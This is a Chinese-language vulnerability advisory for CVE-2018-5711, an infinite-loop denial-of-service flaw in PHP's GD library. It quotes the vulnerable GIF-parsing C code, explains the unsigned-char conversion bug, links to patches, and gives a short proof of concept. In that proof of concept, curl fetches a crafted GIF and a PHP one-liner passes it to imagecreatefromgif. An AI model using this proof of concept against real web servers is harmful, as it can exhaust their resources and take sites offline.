PHP GD Graphics Library存在拒絕服務漏洞-CVE-2018-5711(CNVD收錄編號爲CNVD-2018-02505),可導致服務器計算資源大量消耗,直至崩潰宕機。
GD Graphics Library(libgd)是用來動態創建圖像的開源圖形軟件庫,主要用在圖像驗證碼、頭像、網絡相冊等方面,用戶使用十分廣泛。GD圖形庫中的gd_gif_in.c存在整數簽名錯誤,通過特殊構造的GIF文件使程序在調用imagecreatefromgif或imagecreatefromstring的PHP函數時導致無限循環。漏洞細節及利用代碼在互聯網公開,使用GD庫處理圖像的站點基本上會中招,危害較大。
出現漏洞的文件爲 ext/gd/libgd/gd_gif_in.c 具體代碼如下:
do {
sd->firstcode = sd->oldcode =
GetCode(fd, &sd->scd, sd->code_size, FALSE, ZeroDataBlockP);
} while (sd->firstcode == sd->clear_code);
static int
GetCode_(gdIOCtx *fd, CODE_STATIC_DATA *scd, int code_size, int flag, int *ZeroDataBlockP)
{
int i, j, ret;
unsigned char count;
if (flag) {
scd->curbit = 0;
scd->lastbit = 0;
scd->last_byte = 0;
scd->done = FALSE;
return 0;
}
if ( (scd->curbit + code_size) >= scd->lastbit) {
if (scd->done) {
if (scd->curbit >= scd->lastbit) {
/* Oh well */
}
return -1;
}
scd->buf[0] = scd->buf[scd->last_byte-2];
scd->buf[1] = scd->buf[scd->last_byte-1];
if ((count = GetDataBlock(fd, &scd->buf[2], ZeroDataBlockP)) <= 0)
scd->done = TRUE;
scd->last_byte = 2 + count;
scd->curbit = (scd->curbit - scd->lastbit) + 16;
scd->lastbit = (2+count)*8 ;
}
if ((scd->curbit + code_size - 1) >= (CSD_BUF_SIZE * 8)) {
ret = -1;
} else {
ret = 0;
for (i = scd->curbit, j = 0; j < code_size; ++i, ++j) {
ret |= ((scd->buf[i / 8] & (1 << (i % 8))) != 0) << j;
}
}
scd->curbit += code_size;
return ret;
}
GetCode會調用GetDataBlock函數讀取GIF圖中的數據。
static int
GetDataBlock_(gdIOCtx *fd, unsigned char *buf, int *ZeroDataBlockP)
{
unsigned char count;
if (! ReadOK(fd,&count,1)) {
return -1;
}
*ZeroDataBlockP = count == 0;
if ((count != 0) && (! ReadOK(fd, buf, count))) {
return -1;
}
return count;
}
該漏洞依賴於從整形(int)到無符號字符(unsigned char)的類型轉換。如果GetDataBlock_返回-1,則第400行中的scd->done將會被設置爲True,並停止while循環。但是其定義的count是無符號字符,它總是從0到255的正數,所以這種循環停止動作是不會被觸發執行的,遠程攻擊者通過構造的GIF文件調用PHP函數imagecreatefromgif或imagecreatefromstring可導致無限循環,耗盡服務器資源,造成拒絕服務攻擊。
POC:
$ curl https://gist.githubusercontent.com/orangetw/adb0e2519df267eb54d8b68027a91d4c/raw/7a7d6938f59dd89e9a9b7304d71f8f6640609479/poc.gif.xxd | xxd -r > poc.gif $ php -r 'imagecreatefromgif("poc.gif");'
Linux 直接調用函數進行測試如下:
Windows 搭建WEB環境測試如下:
解決方案:
PHP廠商已在最新版本中修復了該漏洞:http://php.net/downloads.php
Libgd暫未發佈新版本,請及時關注廠商主頁:http://libgd.github.io/
參考鏈接:
http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5711
http://www.cnvd.org.cn/webinfo/show/4405